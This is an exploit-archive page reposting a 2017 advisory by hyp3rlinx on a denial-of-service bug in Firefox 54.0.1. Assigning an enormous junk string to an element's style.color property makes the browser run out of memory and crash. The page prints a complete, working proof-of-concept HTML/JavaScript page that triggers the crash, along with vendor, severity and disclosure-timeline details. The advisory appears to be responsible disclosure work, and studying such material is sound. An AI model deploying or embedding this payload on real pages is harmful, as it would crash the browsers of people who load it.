首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox 54.0.1 - Denial of Service
来源:hyp3rlinx.altervista.org 作者:hyp3rlinx 发布时间:2017-07-10  
[+] Credits: John Page aka hyp3rlinx   
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec           
 
 
 
Vendor:
===============
www.mozilla.org
 
 
 
Product:
===============
Firefox v54.0.1
 
 
 
Vulnerability Type:
===================
Denial Of Service
 
 
 
Security Issue:
================
Dynamically creating HTML elements IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA and assigning very long string of junk chars to the
"style.color" property results in Firefox Browser out of memory crash (not tab crash).
 
Tested on Windows 7
 
References:
https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288
 
 
Exploit/POC:
=============
<html>
<body>
<script>
 
var p1 = "\x41";
for (var c=0;c<0xC350;c++){
p1+="\x41";
}
var p2="\x41";
for (c=0;c<0x1388;c++){
p2 += p1;
}       
var el = document.createElement('img')  //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA  //<=== OR any of these elements.
el.style.color=p2
document.body.appendChild(el)
          
</script>
</body>
 
</html>
 
 
Network Access:
===============
Remote
 
 
 
Severity:
=========
Medium
 
 
 
 
Disclosure Timeline:
=============================
Vendor Notification: June 27, 2017
July 7, 2017  : Public Disclosure
 
 
 
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
 
hyp3rlinx
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IoT mDNS/DNS-SD QM Amplificati
·Yaws 1.91 - Remote File Disclo
·rpcinfo Portmap DUMP Call Ampl
·Easy File Sharing Web Server 7
·Lepide Auditor Suite - 'create
·DNS/DNSSEC RR Stub Resolver De
·GoAutoDial 3.3 - Authenticatio
·WMI Event Subscription Persist
·Humax HG100R 2.0.6 - Backup Fi
·Microsoft Windows Windows 7/8.
·ActiveMQ < 5.14.0 - web shell
·IBM Informix 12.10 DB-Access B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved